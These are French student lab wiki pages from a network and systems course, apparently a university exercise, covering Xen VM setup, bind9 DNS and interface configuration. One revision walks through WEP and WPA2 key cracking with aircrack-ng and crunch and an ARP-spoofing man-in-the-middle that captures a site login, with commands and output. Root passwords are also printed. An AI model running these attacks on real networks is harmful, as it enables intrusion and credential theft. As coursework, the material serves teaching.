La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54012</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54012"/>
				<updated>2020-11-27T17:07:25Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Architecture réseau */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on ajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une passerelle doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interface avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comme ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
L'architecture du réseau est la suivante : &lt;br /&gt;
[[Fichier:Architecture2-MA2a5-2020_2021.JPG]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par Gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
